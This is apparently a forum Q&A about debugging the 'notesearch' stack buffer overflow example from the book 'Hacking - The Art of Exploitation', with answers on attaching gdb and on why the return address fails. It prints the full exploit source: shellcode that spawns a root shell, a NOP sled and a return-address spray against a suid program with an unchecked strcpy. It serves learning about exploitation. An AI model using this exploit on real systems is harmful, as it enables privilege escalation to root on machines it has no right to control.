# Hacking - The Art of Exploitation: debugging buffer overflow example

Tags: c, linux, overflow, exploit

I'm reading the book "Hacking - The Art of Exploitation".
There is an example on a stack buffer overflow.

This is a part of the source of the attacked program, "notesearch":

```
char searchstring[100];
// ...
if(argc > 1)                      
    strcpy(searchstring, argv[1]);   // <-- no length check
```

And here is the source of the attacking program, "exploit_notesearch":

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

   strcat(command, "\'");
   // <-- dumping full command string here
   system(command); // run exploit
   free(command);
}
```

When running exploit_notesearch, everything works fine, I'll get a root shell as the notesearch program has suid rights.
The command string contains the name of the program to call, a NOP sled, the shellcode and the return adress to the shellcode.

I want to debug the exploited program with gdb to see how the exploit exactly works.
To do this, I dumped the command string (right before the call to system()) into a file (let's call it dump.txt).
Then from a shell I tried to get the same result, I called the exploited program directly with the dumped command string as an argument.

prompt> $(cat dump.txt)

The notesearch program started, but instead of a root shell I got a segmentation fault.
I've also varied the return adress in a very wide range via a script.

My question, what is the difference between:

- starting notesearch via the shell
- starting notesearch via system

Maybe you also know another way to debug the exploited program via gdb.

Comment: Why don't you use gdb to step through the entire program? Why dump the command string?

Comment: Any chance that you are running on a machine that has execute protection on the stack and/or you compiled your code for 64-bit?

Comment: I tried to step into the child using set follow-fork-mode child, which doesn't work with gdb 6.6 (I have to use this gdb cause it is included with the LIVE CD shipped with the book). Also tried to add a sleep() in the child, and after forking tried to attach to the PID - didn't work cause command prompt in gdb is disabled for the time of the sleep!? 


I'm using the Live CD with an old Ubuntu version, which doesn't use those protections. When compiled on a up to date environment and OS, the exploit doesn't work, because there are many things like ASLR enabled.

Answer (score 3, accepted):

Got it working:
Added the following lines at the beginning of main in the notesearch program, which sleeps 45s:

```
#ifdef MY_DEBUG
printf("child running - sleep()\n");
fflush(stdout);
sleep(45);
printf("child running - sleep() finished\n");
#endif
```

Then I start exploit_notesearch, which itself starts notesearch which now waits 45s.
In another shell I list all running processes to get the PID of the notesearch process.
Then I run gdb, attach to this process, and can then watch the exploit in the debugger.

Answer (score -1):

In `exploit_notesearch.c`, the return address was calculated with reference to the variable `i`, which was declared in the main function of `exploit_notesearch.c`

So the command string now contains return address w.r.t to variable `i`. When you output the command string to a file and then execute it directly with `./notesearch <command>`

This return address might probably be referring to a memory location which is inaccessible to your current notesearch program, hence the seg fault.